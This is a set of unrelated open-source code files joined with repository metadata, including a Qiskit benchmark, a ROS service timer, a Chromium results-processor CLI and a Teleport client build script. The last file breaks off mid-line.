ari_table, ari_views else: return ari_table_mean, ari_views_mean def create_test_set(M_c, T, X_L, X_D, n_test, seed_seed=0): sample_row_idx = len(T) + 1 n_cols = len(T[0]) Y = [] Q = [(sample_row_idx, col_idx) for col_idx in range(n_cols)] int_generator = gu.int_generator(seed_seed) get_next_seed = lambda: int_generator.next() samples = su.simple_predictive_sample(M_c, X_L, X_D, Y, Q, get_next_seed, n=n_test) return samples # FIXME: remove dependence on T as input # by making p_State constructor actually use only suffstats def calc_mean_test_log_likelihood(M_c, T, X_L, X_D, T_test): state = State.p_State(M_c, T, X_L, X_D) test_log_likelihoods = map(state.calc_row_predictive_logp, T_test) mean_test_log_likelihood = numpy.mean(test_log_likelihoods) return mean_test_log_likelihood def calc_mean_test_log_likelihoods(M_c, T, X_L_list, X_D_list, T_test): mean_test_log_likelihoods = [] for X_L, X_D in zip(X_L_list, X_D_list): mean_test_log_likelihood = calc_mean_test_log_likelihood(M_c, T, X_L, X_D, T_test) mean_test_log_likelihoods.append(mean_test_log_likelihood) return mean_test_log_likelihoods
44.075758
186
0.719147
4debb766c3fe5106b666815ce1a1772e065de58a
727
py
Python
irida_staramr_results/test_unit/test_downloader.py
phac-nml/irida-staramr-results
7574b6eead97929605bdaf226cb34062b20c1dac
[ "Apache-2.0" ]
2
2021-04-19T16:07:45.000Z
2021-07-05T15:09:04.000Z
irida_staramr_results/test_unit/test_downloader.py
phac-nml/irida-staramr-results
7574b6eead97929605bdaf226cb34062b20c1dac
[ "Apache-2.0" ]
16
2021-02-05T19:25:13.000Z
2021-11-30T18:01:16.000Z
irida_staramr_results/test_unit/test_downloader.py
phac-nml/irida-staramr-results
7574b6eead97929605bdaf226cb34062b20c1dac
[ "Apache-2.0" ]
3
2021-03-08T14:01:15.000Z
2021-07-20T16:39:21.000Z
import unittest from irida_staramr_results.downloader import _get_output_file_name class TestDownloader(unittest.TestCase): def setUp(self): print("\nStarting " + self.__module__ + ": " + self._testMethodName) def tearDown(self): pass def test_get_output_file(self): """ Test output file name generation is correct. :return: """ fake_prefix_name = "out" fake_timestamp_in_millisec = 1611090794000 res_milli = _get_output_file_name(fake_prefix_name, fake_timestamp_in_millisec) self.assertNotIn(".xlsx", res_milli) self.assertEqual(res_milli, "out-2021-01-19T21-13-14") if __name__ == '__main__': unittest.main()
23.451613
87
0.672627
b373fdbd5517742623a5158e4b39ae13ef4c20fe
4,010
py
Python
simulation/src/launch_tools/scripts/launch_tools/services_timer.py
LeonardII/KitCarFork
b2802c5b08cc8250446ce3731cb622af064db4ca
[ "MIT" ]
null
null
null
simulation/src/launch_tools/scripts/launch_tools/services_timer.py
LeonardII/KitCarFork
b2802c5b08cc8250446ce3731cb622af064db4ca
[ "MIT" ]
null
null
null
simulation/src/launch_tools/scripts/launch_tools/services_timer.py
LeonardII/KitCarFork
b2802c5b08cc8250446ce3731cb622af064db4ca
[ "MIT" ]
null
null
null
#!/usr/bin/env python """Copyright (c) 2013, Systems, Robotics and Vision Group University of the Balearican Islands All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Systems, Robotics and Vision Group, University of the Balearican Islands nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import roslib roslib.load_manifest("launch_tools") import sys import threading import rospy import rosservice ## Class for calling a service using a timer. class TimedService(threading.Thread): ## The constructor # @param self The object pointer. # @param name The service name this class is going to call # @param freq The desired timer period def __init__(self, name, period): threading.Thread.__init__(self) self._service_name = name self._service_period = period ## Run function required by threading library def run(self): rospy.wait_for_service(self._service_name) rospy.Timer(rospy.Duration(self._service_period), self.callback) rospy.loginfo( "Initialized timer for service: \n\t* Name: %s\n\t* Period: %f ", self._service_name, self._service_period, ) ## Timer callback # @param event The event that has generated this callback def callback(self, event): rospy.wait_for_service(self._service_name) service_class = rosservice.get_service_class_by_name(self._service_name) try: service = rospy.ServiceProxy(self._service_name, service_class) service() rospy.loginfo("Service %s called.", self._service_name) except rospy.ServiceException, e: rospy.logwarn("Service %s call failed: %s", self._service_name, e) ## @var _service_name # The service name going to be called _service_name = "service" ## @var _service_period # The timer period to call the service _service_period = 1.0 ## Print usage for people that does not deserve to use this awesome python node. def usage(): return "%s service period [service period ...]" % sys.argv[0] ## main function if __name__ == "__main__": rospy.init_node("services_timer") if len(sys.argv) >= 3: names = sys.argv[1 : len(sys.argv) : 2] periods = sys.argv[2 : len(sys.argv) : 2] rospy.loginfo("names : %s", names) rospy.loginfo("periods : %s", periods) ts_list = [] for name, period in zip(names, periods): ts_list.append(TimedService(str(name), float(period))) for ts in ts_list: ts.start() else: rospy.loginfo(usage()) sys.exit(1) rospy.spin()
37.830189
86
0.702993
b997b907b13ae65512d576ca309ad7a35494a3e4
565
bzl
Python
consensus/conf.bzl
francescolavra/entangled
b580441a79859455aff77fb158db31f582c24847
[ "Apache-2.0" ]
null
null
null
consensus/conf.bzl
francescolavra/entangled
b580441a79859455aff77fb158db31f582c24847
[ "Apache-2.0" ]
null
null
null
consensus/conf.bzl
francescolavra/entangled
b580441a79859455aff77fb158db31f582c24847
[ "Apache-2.0" ]
null
null
null
CONSENSUS_MAINNET_VARIABLES = [ "SNAPSHOT_CONF_FILE='\"external/snapshot_conf_mainnet/file/downloaded\"'", "SNAPSHOT_SIG_FILE='\"external/snapshot_sig_mainnet/file/downloaded\"'", "SNAPSHOT_FILE='\"external/snapshot_mainnet/file/downloaded\"'", "NUM_KEYS_IN_MILESTONE=20", "MWM=14", ] CONSENSUS_TESTNET_VARIABLES = [ "SNAPSHOT_CONF_FILE='\"external/snapshot_conf_testnet/file/downloaded\"'", "SNAPSHOT_SIG_FILE='\"\"'", "SNAPSHOT_FILE='\"external/snapshot_testnet/file/downloaded\"'", "NUM_KEYS_IN_MILESTONE=22", "MWM=9", ]
35.3125
78
0.723894
f986d49847702197173712d11338d000520ba73f
3,867
py
Python
lib/datasets/dataset_catalog.py
BarneyQiao/pcl.pytorch
4e0280e5e1470f705e620eda26f881d627c5016c
[ "MIT" ]
233
2019-05-10T07:17:42.000Z
2022-03-30T09:24:16.000Z
lib/datasets/dataset_catalog.py
BarneyQiao/pcl.pytorch
4e0280e5e1470f705e620eda26f881d627c5016c
[ "MIT" ]
78
2019-05-10T21:10:47.000Z
2022-03-29T13:57:32.000Z
lib/datasets/dataset_catalog.py
BarneyQiao/pcl.pytorch
4e0280e5e1470f705e620eda26f881d627c5016c
[ "MIT" ]
57
2019-05-10T07:17:37.000Z
2022-03-24T04:43:24.000Z
# Copyright (c) 2017-present, Facebook, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################## """Collection of available datasets.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import os from core.config import cfg # Path to data dir _DATA_DIR = cfg.DATA_DIR # Required dataset entry keys IM_DIR = 'image_directory' ANN_FN = 'annotation_file' # Optional dataset entry keys IM_PREFIX = 'image_prefix' DEVKIT_DIR = 'devkit_directory' RAW_DIR = 'raw_dir' # Available datasets DATASETS = { 'coco_2014_train': { IM_DIR: _DATA_DIR + '/coco/images/train2014', ANN_FN: _DATA_DIR + '/coco/annotations/instances_train2014.json' }, 'coco_2014_val': { IM_DIR: _DATA_DIR + '/coco/images/val2014', ANN_FN: _DATA_DIR + '/coco/annotations/instances_val2014.json' }, 'coco_2014_minival': { IM_DIR: _DATA_DIR + '/coco/images/val2014', ANN_FN: _DATA_DIR + '/coco/annotations/instances_minival2014.json' }, 'coco_2014_valminusminival': { IM_DIR: _DATA_DIR + '/coco/images/val2014', ANN_FN: _DATA_DIR + '/coco/annotations/instances_valminusminival2014.json' }, 'coco_2015_test': { IM_DIR: _DATA_DIR + '/coco/images/test2015', ANN_FN: _DATA_DIR + '/coco/annotations/image_info_test2015.json' }, 'coco_2015_test-dev': { IM_DIR: _DATA_DIR + '/coco/images/test2015', ANN_FN: _DATA_DIR + '/coco/annotations/image_info_test-dev2015.json' }, 'coco_2017_train': { IM_DIR: _DATA_DIR + '/coco/images/train2017', ANN_FN: _DATA_DIR + '/coco/annotations/instances_train2017.json', }, 'coco_2017_val': { IM_DIR: _DATA_DIR + '/coco/images/val2017', ANN_FN: _DATA_DIR + '/coco/annotations/instances_val2017.json', }, 'coco_2017_test': { # 2017 test uses 2015 test images IM_DIR: _DATA_DIR + '/coco/images/test2015', ANN_FN: _DATA_DIR + '/coco/annotations/image_info_test2017.json', IM_PREFIX: 'COCO_test2015_' }, 'coco_2017_test-dev': { # 2017 test-dev uses 2015 test images IM_DIR: _DATA_DIR + '/coco/images/test2015', ANN_FN: _DATA_DIR + '/coco/annotations/image_info_test-dev2017.json', IM_PREFIX: 'COCO_test2015_' }, 'voc_2007_trainval': { IM_DIR: _DATA_DIR + '/VOC2007/JPEGImages', ANN_FN: _DATA_DIR + '/VOC2007/annotations/voc_2007_trainval.json', DEVKIT_DIR: _DATA_DIR }, 'voc_2007_test': { IM_DIR: _DATA_DIR + '/VOC2007/JPEGImages', ANN_FN: _DATA_DIR + '/VOC2007/annotations/voc_2007_test.json', DEVKIT_DIR: _DATA_DIR }, 'voc_2012_trainval': { IM_DIR: _DATA_DIR + '/VOC2012/JPEGImages', ANN_FN: _DATA_DIR + '/VOC2012/annotations/voc_2012_trainval.json', DEVKIT_DIR: _DATA_DIR } }
29.746154
78
0.605379
bf1ee9086b57e9e853ba008e72e1a67bbfca0ff8
4,438
py
Python
benchmark/startQiskit_QC1048.py
UCLA-SEAL/QDiff
d968cbc47fe926b7f88b4adf10490f1edd6f8819
[ "BSD-3-Clause" ]
null
null
null
benchmark/startQiskit_QC1048.py
UCLA-SEAL/QDiff
d968cbc47fe926b7f88b4adf10490f1edd6f8819
[ "BSD-3-Clause" ]
null
null
null
benchmark/startQiskit_QC1048.py
UCLA-SEAL/QDiff
d968cbc47fe926b7f88b4adf10490f1edd6f8819
[ "BSD-3-Clause" ]
null
null
null
# qubit number=5 # total number=51 import cirq import qiskit from qiskit import IBMQ from qiskit.providers.ibmq import least_busy from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister from qiskit import BasicAer, execute, transpile from pprint import pprint from qiskit.test.mock import FakeVigo from math import log2,floor, sqrt, pi import numpy as np import networkx as nx def build_oracle(n: int, f) -> QuantumCircuit: # implement the oracle O_f^\pm # NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate # or multi_control_Z_gate (issue #127) controls = QuantumRegister(n, "ofc") oracle = QuantumCircuit(controls, name="Zf") for i in range(2 ** n): rep = np.binary_repr(i, n) if f(rep) == "1": for j in range(n): if rep[j] == "0": oracle.x(controls[j]) # oracle.h(controls[n]) if n >= 2: oracle.mcu1(pi, controls[1:], controls[0]) for j in range(n): if rep[j] == "0": oracle.x(controls[j]) # oracle.barrier() return oracle def make_circuit(n:int,f) -> QuantumCircuit: # circuit begin input_qubit = QuantumRegister(n,"qc") classical = ClassicalRegister(n, "qm") prog = QuantumCircuit(input_qubit, classical) prog.h(input_qubit[0]) # number=3 prog.h(input_qubit[1]) # number=4 prog.h(input_qubit[2]) # number=5 prog.h(input_qubit[3]) # number=6 prog.h(input_qubit[0]) # number=38 prog.cz(input_qubit[1],input_qubit[0]) # number=39 prog.h(input_qubit[0]) # number=40 prog.h(input_qubit[0]) # number=48 prog.cz(input_qubit[1],input_qubit[0]) # number=49 prog.h(input_qubit[0]) # number=50 prog.z(input_qubit[1]) # number=46 prog.cx(input_qubit[1],input_qubit[0]) # number=47 prog.h(input_qubit[0]) # number=32 prog.cz(input_qubit[1],input_qubit[0]) # number=33 prog.h(input_qubit[0]) # number=34 prog.h(input_qubit[4]) # number=21 Zf = build_oracle(n, f) repeat = floor(sqrt(2 ** n) * pi / 4) for i in range(repeat): prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)]) prog.h(input_qubit[0]) # number=1 prog.h(input_qubit[1]) # number=2 prog.h(input_qubit[2]) # number=7 prog.h(input_qubit[3]) # number=8 prog.cx(input_qubit[3],input_qubit[0]) # number=41 prog.z(input_qubit[3]) # number=42 prog.cx(input_qubit[3],input_qubit[0]) # number=43 prog.cx(input_qubit[1],input_qubit[3]) # number=44 prog.x(input_qubit[0]) # number=9 prog.x(input_qubit[1]) # number=10 prog.x(input_qubit[2]) # number=11 prog.cx(input_qubit[0],input_qubit[3]) # number=35 prog.x(input_qubit[3]) # number=36 prog.cx(input_qubit[0],input_qubit[3]) # number=37 if n>=2: prog.mcu1(pi,input_qubit[1:],input_qubit[0]) prog.cx(input_qubit[1],input_qubit[0]) # number=24 prog.x(input_qubit[0]) # number=25 prog.cx(input_qubit[1],input_qubit[0]) # number=26 prog.x(input_qubit[1]) # number=14 prog.x(input_qubit[2]) # number=15 prog.x(input_qubit[3]) # number=16 prog.h(input_qubit[0]) # number=17 prog.h(input_qubit[1]) # number=18 prog.h(input_qubit[2]) # number=19 prog.h(input_qubit[3]) # number=20 prog.x(input_qubit[1]) # number=22 prog.x(input_qubit[1]) # number=23 # circuit end for i in range(n): prog.measure(input_qubit[i], classical[i]) return prog if __name__ == '__main__': key = "00000" f = lambda rep: str(int(rep == key)) prog = make_circuit(5,f) IBMQ.load_account() provider = IBMQ.get_provider(hub='ibm-q') provider.backends() backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True)) sample_shot =7924 info = execute(prog, backend=backend, shots=sample_shot).result().get_counts() backend = FakeVigo() circuit1 = transpile(prog,backend,optimization_level=2) writefile = open("../data/startQiskit_QC1048.csv","w") print(info,file=writefile) print("results end", file=writefile) print(circuit1.depth(),file=writefile) print(circuit1,file=writefile) writefile.close()
32.394161
165
0.623704
51c3ef48c338f4fd5eaaa54d7c42c14c05ef93ee
7,950
py
Python
tools/perf/core/results_processor/command_line.py
zealoussnow/chromium
fd8a8914ca0183f0add65ae55f04e287543c7d4a
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
76
2020-09-02T03:05:41.000Z
2022-03-30T04:40:55.000Z
tools/perf/core/results_processor/command_line.py
zealoussnow/chromium
fd8a8914ca0183f0add65ae55f04e287543c7d4a
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
45
2020-09-02T03:21:37.000Z
2022-03-31T22:19:45.000Z
tools/perf/core/results_processor/command_line.py
zealoussnow/chromium
fd8a8914ca0183f0add65ae55f04e287543c7d4a
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
8
2020-07-22T18:49:18.000Z
2022-02-08T10:27:16.000Z
# Copyright 2019 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Implements the interface of the results_processor module. Provides functions to parse command line arguments and process options. """ import argparse import datetime import logging import os import re import sys from py_utils import cloud_storage from core.results_processor import formatters from core.results_processor import util def ArgumentParser(standalone=False): """Create an ArgumentParser defining options required by the processor.""" all_output_formats = list(formatters.FORMATTERS.keys()) if not standalone: all_output_formats.append('none') parser, group = _CreateTopLevelParser(standalone) parser.add_argument( '-v', '--verbose', action='count', dest='verbosity', default=0, help='Increase verbosity level (repeat as needed)') group.add_argument( '--output-format', action='append', dest='output_formats', metavar='FORMAT', choices=all_output_formats, required=standalone, help=Sentences( 'Output format to produce.', 'May be used multiple times to produce multiple outputs.', 'Avaliable formats: %(choices)s.', '' if standalone else 'Defaults to: html.')) group.add_argument( '--intermediate-dir', metavar='DIR_PATH', required=standalone, help=Sentences( 'Path to a directory where intermediate results are stored.', '' if standalone else 'If not provided, the default is to create a ' 'new directory within "{output_dir}/artifacts/".')) group.add_argument( '--output-dir', default=_DefaultOutputDir(), metavar='DIR_PATH', help=Sentences( 'Path to a directory where to write final results.', 'Default: %(default)s.')) group.add_argument( '--max-values-per-test-case', type=int, metavar='NUM', help=Sentences( 'Fail a test run if it produces more than this number of values.' 'This includes both ad hoc and metric generated measurements.')) group.add_argument( '--reset-results', action='store_true', help=Sentences( 'Overwrite any previous output files in the output directory.', 'The default is to append to existing results.')) group.add_argument( '--results-label', metavar='LABEL', help='Label to identify the results generated by this run.') group.add_argument( '--test-path-format', metavar='FORMAT', choices=[util.TELEMETRY_TEST_PATH_FORMAT, util.GTEST_TEST_PATH_FORMAT], default=util.TELEMETRY_TEST_PATH_FORMAT, help=Sentences( 'How to interpret the testPath attribute.', 'Available options: %(choices)s. Default: %(default)s.')) group.add_argument( '--trace-processor-path', help=Sentences('Path to trace processor shell.', 'Default: download a pre-built version from the cloud.')) group.add_argument( '--upload-results', action='store_true', help='Upload generated artifacts to cloud storage.') group.add_argument( '--upload-bucket', default='output', metavar='BUCKET', help=Sentences( 'Storage bucket to use for uploading artifacts.', 'Supported values are: %s; or a valid cloud storage bucket name.' % ', '.join(sorted(cloud_storage.BUCKET_ALIASES)), 'Defaults to: %(default)s.')) group.add_argument( '--experimental-tbmv3-metrics', action='store_true', help='Enable running experimental TBMv3 metrics.') group.add_argument( '--fetch-power-profile', action='store_true', help=('Specify this if you want to run proxy power metrics that use ' 'device power profiles.')) group.add_argument( '--extra-metric', action='append', dest='extra_metrics', metavar='METRIC', help=('Compute an extra metric on the test results. Metric should have ' 'the form "version:name", e.g. "tbmv3:power_rails_metric". ' 'Can be used multiple times.')) group.add_argument( '--is-unittest', action='store_true', help='Is running inside a unittest.') group.add_argument( '--fetch-device-data', action='store_true', help='Android-specific argument to enable fetching data from a device.') group.add_argument( '--device-data-path', dest='device_data_path', help=('Android-specific argument for --fetch-data-device. Use this to ' 'specify the path on device to pull data from using adb.')) group.add_argument( '--local-data-path', dest='local_data_path', default=os.environ.get('ISOLATED_OUTDIR'), help=('Android-specific argument for --fetch-data-device. Use this to ' 'override the local copy path. Defaults to ISOLATED_OUTDIR ' 'environment variable.')) return parser def ProcessOptions(options): """Adjust result processing options as needed before running benchmarks. Note: The intended scope of this function is limited to only adjust options defined by the ArgumentParser above. One should not attempt to read or modify any other attributes that the options object may have. Currently the main job of this function is to tease out and separate output formats to be handled by the results processor, from those that should fall back to the legacy output formatters in Telemetry. Args: options: An options object with values parsed from the command line. """ if options.verbosity >= 2: logging.getLogger().setLevel(logging.DEBUG) elif options.verbosity == 1: logging.getLogger().setLevel(logging.INFO) else: logging.getLogger().setLevel(logging.WARNING) # The output_dir option is None or missing if the selected Telemetry command # does not involve output generation, e.g. "run_benchmark list", and the # argument parser defined above was not invoked. if getattr(options, 'output_dir', None) is None: return def resolve_dir(path): return os.path.realpath(os.path.expanduser(path)) options.output_dir = resolve_dir(options.output_dir) if options.intermediate_dir: options.intermediate_dir = resolve_dir(options.intermediate_dir) else: if options.results_label: filesafe_label = re.sub(r'\W+', '_', options.results_label) else: filesafe_label = 'run' start_time = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ') options.intermediate_dir = os.path.join( options.output_dir, 'artifacts', '%s_%s' % (filesafe_label, start_time)) if options.upload_results: options.upload_bucket = cloud_storage.BUCKET_ALIASES.get( options.upload_bucket, options.upload_bucket) else: options.upload_bucket = None if not options.output_formats: options.output_formats = ['html'] else: options.output_formats = sorted(set(options.output_formats)) if 'none' in options.output_formats: options.output_formats.remove('none') def _CreateTopLevelParser(standalone): """Create top level parser, and group for result options.""" if standalone: parser = argparse.ArgumentParser( description='Standalone command line interface to results_processor.') # In standalone mode, both the parser and group are the same thing. return parser, parser else: parser = argparse.ArgumentParser(add_help=False) group = parser.add_argument_group(title='Result processor options') return parser, group def _DefaultOutputDir(): """Default output directory. Points to the directory of the benchmark runner script, if found, or the current working directory otherwise. """ main_module = sys.modules['__main__'] if hasattr(main_module, '__file__'): return os.path.realpath(os.path.dirname(main_module.__file__)) else: return os.getcwd() def Sentences(*args): return ' '.join(s for s in args if s)
38.592233
80
0.69673
da84c603ef3231977a96c020227ad4964a69345c
9,777
py
Python
build/builder/build-assist.py
zhoulhb/teleport
54da194697898ef77537cfe7032d774555dc1335
[ "Apache-2.0" ]
3
2019-02-18T09:14:37.000Z
2019-07-30T08:40:21.000Z
build/builder/build-assist.py
zhoulhb/teleport
54da194697898ef77537cfe7032d774555dc1335
[ "Apache-2.0" ]
null
null
null
build/builder/build-assist.py
zhoulhb/teleport
54da194697898ef77537cfe7032d774555dc1335
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- from core import colorconsole as cc from core import utils from core.ver import * from core.context import * from core.env import env ctx = BuildContext() class BuilderBase: def __init__(self): self.out_dir = '' def build_exe(self): pass def build_rdp(self): pass def build_installer(self): pass class BuilderWin(BuilderBase): def __init__(self): super().__init__() def build_exe(self): cc.i('build tp_assist...') sln_file = os.path.join(env.root_path, 'client', 'tp_assist_win', 'tp_assist.vs2017.sln') out_file = os.path.join(env.root_path, 'out', 'client', ctx.bits_path, ctx.target_path, 'tp_assist.exe') if os.path.exists(out_file): utils.remove(out_file) utils.msvc_build(sln_file, 'tp_assist', ctx.target_path, ctx.bits_path, False) utils.ensure_file_exists(out_file) # def build_rdp(self): # cc.n('build tp_rdp...') # sln_file = os.path.join(ROOT_PATH, 'client', 'tp_rdp', 'tp_rdp.2015.sln') # out_file = os.path.join(ROOT_PATH, 'out', 'client', ctx.bits_path, ctx.target_path, 'tp_rdp.exe') # if os.path.exists(out_file): # utils.remove(out_file) # utils.msvc_build(sln_file, 'tp_rdp', ctx.target_path, ctx.bits_path, False) # utils.ensure_file_exists(out_file) def build_installer(self): cc.i('build assist installer...') name = 'teleport-assist-{}-{}'.format(ctx.dist, VER_TP_ASSIST) out_path = os.path.join(env.root_path, 'out', 'installer') utils.makedirs(out_path) out_file = os.path.join(out_path, '{}.exe'.format(name)) utils.remove(out_file) self._build_installer() utils.ensure_file_exists(out_file) @staticmethod def _build_installer(): tmp_path = os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist') tmp_app_path = os.path.join(tmp_path, 'apps') tmp_cfg_path = os.path.join(tmp_app_path, 'cfg') if os.path.exists(tmp_app_path): utils.remove(tmp_app_path) utils.makedirs(tmp_app_path) utils.makedirs(tmp_cfg_path) utils.copy_file(os.path.join(env.root_path, 'out', 'client', ctx.bits_path, ctx.target_path), tmp_app_path, 'tp_assist.exe') utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, ('tp-assist.windows.json', 'tp-assist.json')) utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'cacert.cer') utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'localhost.key') utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'localhost.pem') utils.copy_ex(os.path.join(env.root_path, 'client', 'tp_assist_win'), tmp_app_path, 'site') utils.makedirs(os.path.join(tmp_app_path, 'tools', 'putty')) utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'putty'), os.path.join(tmp_app_path, 'tools', 'putty'), 'putty.exe') utils.makedirs(os.path.join(tmp_app_path, 'tools', 'winscp')) utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'WinSCP.exe') utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'license.txt') utils.makedirs(os.path.join(tmp_app_path, 'tools', 'tprdp')) utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-client.exe') utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-replay.exe') utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'libeay32.dll') utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'ssleay32.dll') utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'msvcr120.dll') utils.copy_file(os.path.join(env.root_path, 'client', 'tools'), os.path.join(tmp_app_path, 'tools'), 'securecrt-telnet.vbs') utils.nsis_build(os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist', 'installer.nsi')) class BuilderMacOS(BuilderBase): def __init__(self): super().__init__() def build_exe(self): cc.i('build tp_assist...') configuration = ctx.target_path.capitalize() proj_file = os.path.join(env.root_path, 'client', 'tp_assist_macos', 'TP-Assist.xcodeproj') out_file = os.path.join(env.root_path, 'client', 'tp_assist_macos', 'build', configuration, 'TP-Assist.app') if os.path.exists(out_file): utils.remove(out_file) utils.xcode_build(proj_file, 'TP-Assist', configuration, False) utils.ensure_file_exists(os.path.join(out_file, 'Contents', 'Info.plist')) def build_installer(self): cc.i('make tp_assist dmg file...') json_file = os.path.join(env.root_path, 'dist', 'client', 'macos', 'dmg.json') dmg_file = os.path.join(env.root_path, 'out', 'client', 'macos', 'teleport-assist-macos-{}.dmg'.format(VER_TP_ASSIST)) if os.path.exists(dmg_file): utils.remove(dmg_file) utils.make_dmg(json_file, dmg_file) utils.ensure_file_exists(dmg_file) @staticmethod def _build_installer(): return # tmp_path = os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist') # tmp_app_path = os.path.join(tmp_path, 'apps') # tmp_cfg_path = os.path.join(tmp_app_path, 'cfg') # # if os.path.exists(tmp_app_path): # utils.remove(tmp_app_path) # # utils.makedirs(tmp_app_path) # utils.makedirs(tmp_cfg_path) # # utils.copy_file(os.path.join(env.root_path, 'out', 'client', ctx.bits_path, ctx.target_path), tmp_app_path, 'tp_assist.exe') # utils.copy_file(os.path.join(env.root_path, 'client', 'tp_assist_win', 'cfg'), tmp_cfg_path, ('tp-assist.default.json', 'tp-assist.json')) # # utils.copy_ex(os.path.join(env.root_path, 'client', 'tp_assist_win'), tmp_app_path, 'site') # # utils.makedirs(os.path.join(tmp_app_path, 'tools', 'putty')) # utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'putty'), os.path.join(tmp_app_path, 'tools', 'putty'), 'putty.exe') # # utils.makedirs(os.path.join(tmp_app_path, 'tools', 'winscp')) # utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'WinSCP.exe') # utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'license.txt') # # utils.makedirs(os.path.join(tmp_app_path, 'tools', 'tprdp')) # utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-client.exe') # utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-replay.exe') # utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'libeay32.dll') # utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'ssleay32.dll') # utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'msvcr120.dll') # # utils.copy_file(os.path.join(env.root_path, 'client', 'tools'), os.path.join(tmp_app_path, 'tools'), 'securecrt-telnet.vbs') # # utils.nsis_build(os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist', 'installer.nsi')) class BuilderLinux(BuilderBase): def __init__(self): super().__init__() def build_exe(self): cc.e('not support linux.') # def build_rdp(self): # cc.e('not support linux.') def build_installer(self): cc.e('not support linux.') def gen_builder(dist): if dist == 'windows': builder = BuilderWin() elif dist == 'macos': builder = BuilderMacOS() elif dist == 'linux': builder = BuilderLinux() else: raise RuntimeError('unsupported platform.') ctx.set_dist(dist) return builder def main(): if not env.init(): return builder = None argv = sys.argv[1:] for i in range(len(argv)): if 'debug' == argv[i]: ctx.set_target(TARGET_DEBUG) elif 'x86' == argv[i]: ctx.set_bits(BITS_32) elif 'x64' == argv[i]: ctx.set_bits(BITS_64) elif argv[i] in ctx.dist_all: builder = gen_builder(argv[i]) if builder is None: builder = gen_builder(ctx.host_os) if 'exe' in argv: 